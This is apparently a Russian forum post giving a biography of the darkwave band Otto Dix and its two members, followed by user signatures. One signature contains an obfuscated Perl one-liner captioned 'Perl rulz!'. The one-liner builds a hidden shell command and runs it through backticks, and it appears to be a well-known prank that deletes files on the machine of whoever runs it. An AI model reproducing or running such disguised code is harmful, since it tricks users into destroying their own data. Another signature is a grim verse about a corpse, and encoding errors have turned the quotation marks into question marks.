Отто Дикс? (нем. Otto Dix) ? российский музыкальный коллектив, взявший себе название в честь немецкого художника и графика Отто Дикса (1891?1969).
Группа существует с ноября 2004 года, в том самом составе, в котором её можно видеть сейчас на концертах. ?Отто Дикс? играют в стиле дарквэйв, хотя в музыке проявляются и черты пост-индастриала. Все тексты группы на русском языке.
В период поиска оригинального звучания и ?притирания? коллектив пытался быть трио, но впоследствии гитарист ушёл. С зимы 2004 года ?Отто Дикс? работают вместе с молодёжным театром ?Парадигма времени?, ребята из которого устраивают на сцене настоящий праздник порока, сюрреализма и дикости. Но официально ?Отто Дикс? ? это дуэт.
Michael Draw (Михаэль Драу) ? вокалист, автор текстов. Родился 7 февраля 1981 года в Хабаровске. Обладает уникальным по высоте мужским голосом - контртенором. Учился камерному вокалу, но доучиться не смог. Голос ставился фактически на репетициях ?Отто Дикс?. До этого он пытался петь в группе с ?живым? звуком, но что-то не заладилось. Танцами никогда профессионально не занимался, если не считать пары уроков в детстве и непродолжительного обучения в более осмысленном возрасте. Увлекается компьютерной графикой. Пишет романы и рассказы.
Marie Slip (Мари Слип) ? композитор, аранжировщик. Родился 26 декабря 1980 года на севере Хабаровский край. Увлекается музыкой и программированием. Готикой занялся в 2000 году. До этого писал музыку для компьютерных игр. Slip долго искал нужное звучание. Перебрав множество стилей, он остановился на EBM и Darkwave. Смешав ритм-секцию с дисторшном, он накладывает сверху симфонику и клавиши.
Вышедший в июле 2005 года альбом ?Эго? включает не только 12 треков, но и видеоклип на заглавную тему альбома, а также сборную фотосессию и три статьи из местных газет о группе и о её участниках.
он, он ёжик, по паспорту ёж _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
А тут сразу семь! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.